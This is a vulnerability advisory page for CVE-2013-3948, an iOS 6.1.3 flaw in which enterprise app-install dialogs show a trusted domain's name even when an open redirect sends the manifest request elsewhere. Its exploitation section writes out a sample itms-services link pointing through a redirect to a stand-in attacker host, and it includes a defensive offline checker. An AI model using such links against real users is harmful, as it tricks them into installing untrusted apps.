CVE-2013-3948
Description
iOS 6.1.3 fails to follow redirects when determining the hostname in Enterprise Deployment dialogs, allowing attackers to trick users into installing arbitrary apps via a trusted domain's open redirect.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Apple iOS 6.1.3 does not follow redirects when determining the hostname shown in the Enterprise Deployment installation dialog. When processing an itms-services:// URL whose action is download-manifest, the OS displays the hostname of the URL given in the url parameter, even when that URL redirects elsewhere, instead of the hostname of the final destination that actually serves the manifest. An attacker can therefore use an open redirect on a trusted domain to make a manifest hosted on another domain appear to come from the trusted one. Affected versions: iOS prior to 7.1 (as referenced in [1]).
Exploitation
An attacker needs a trusted domain that contains an open redirect endpoint. The attacker crafts a URL such as itms-services://?action=download-manifest&url=https://trusted.example.com/redirect?url=https://attacker.com/evil.plist. When the user visits this link (e.g., via a phishing email or malicious webpage), iOS opens the Enterprise Deployment dialog showing the trusted domain name rather than the attacker's domain. The user, seeing a trusted source, may approve the installation. No additional authentication or user interaction beyond tapping "Install" is required [1].
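To make the mechanism concrete from the defender's side, the following Python example (added here; not code from the page or from Apple) parses an itms-services:// link, extracts the manifest URL, and compares the hostname a dialog would show if it stopped at the first URL with the hostname it should show after resolving the redirect chain. The redirect table, the hostname untrusted.example.net and the manifest path are constructed stand-ins so the check runs offline with no network access.

```python
"""Which hostname should an enterprise-install dialog show for an
itms-services:// link? The host of the *final* manifest URL after all
redirects, not the host of the first URL in the chain (the CVE-2013-3948 mistake)."""
from urllib.parse import urlparse, parse_qs

# Constructed stand-in for HTTP 3xx responses so the example runs offline.
# Maps a requested URL to the Location header a server would answer with.
REDIRECTS = {
    "https://trusted.example.com/redirect?url=https://untrusted.example.net/app.plist":
        "https://untrusted.example.net/app.plist",
}


def manifest_url(itms_link):
    """Extract the manifest URL from itms-services://?action=download-manifest&url=...
    Assumes the inner URL carries no unencoded '&', as in the link on this page."""
    parts = urlparse(itms_link)
    if parts.scheme != "itms-services":
        raise ValueError("not an itms-services link")
    params = parse_qs(parts.query)
    if params.get("action") != ["download-manifest"]:
        raise ValueError("unsupported action")
    urls = params.get("url", [])
    if len(urls) != 1:
        raise ValueError("expected exactly one url parameter")
    return urls[0]


def resolve_redirects(url, redirects=REDIRECTS, max_hops=10):
    """Follow the redirect chain from the table and return the final URL.
    Stops on a loop or after max_hops so a redirect cycle cannot hang the check."""
    seen = []
    while url in redirects:
        if url in seen or len(seen) >= max_hops:
            raise ValueError("redirect loop or too many hops")
        seen.append(url)
        url = redirects[url]
    return url


def displayed_hosts(itms_link, redirects=REDIRECTS):
    """Return (naive_host, final_host): what a dialog that does not follow
    redirects would display, and what it should display after resolving them."""
    first = manifest_url(itms_link)
    final = resolve_redirects(first, redirects)
    return urlparse(first).hostname, urlparse(final).hostname


def origin_is_misleading(itms_link, redirects=REDIRECTS):
    """True when the naive display would attribute the manifest to the wrong host."""
    naive, final = displayed_hosts(itms_link, redirects)
    return naive != final


if __name__ == "__main__":
    link = ("itms-services://?action=download-manifest"
            "&url=https://trusted.example.com/redirect?url=https://untrusted.example.net/app.plist")
    naive, final = displayed_hosts(link)
    print(f"dialog without redirect resolution shows: {naive}")
    print(f"dialog that resolves redirects shows:     {final}")
    print("misleading:", origin_is_misleading(link))
```

The fixed behaviour corresponds to displaying the second value: the trust decision must be based on the host that ultimately serves the manifest, and a dialog that follows the chain also needs the loop and hop limits above so a malformed redirect cannot stall it.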
Impact
Successful exploitation allows the attacker to install an arbitrary application on the victim's iOS device without the user realizing the app is from an untrusted source. The application runs with the same sandbox restrictions as any App Store app, but it can exfiltrate data, display phishing interfaces, or abuse enterprise capabilities. The attack subverts the user's ability to make an informed trust decision [1].
Mitigation
Apple addressed this issue in iOS 7.1, released on March 10, 2014 [1]. Users should update to iOS 7.1 or later. There is no workaround for iOS 6.1.3 or earlier versions. The vulnerability is not listed on CISA KEV.
AI Insight generated on May 23, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:o:apple:iphone_os:6.1.3:*:*:*:*:*:*:*
- Range: =6.1.3
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.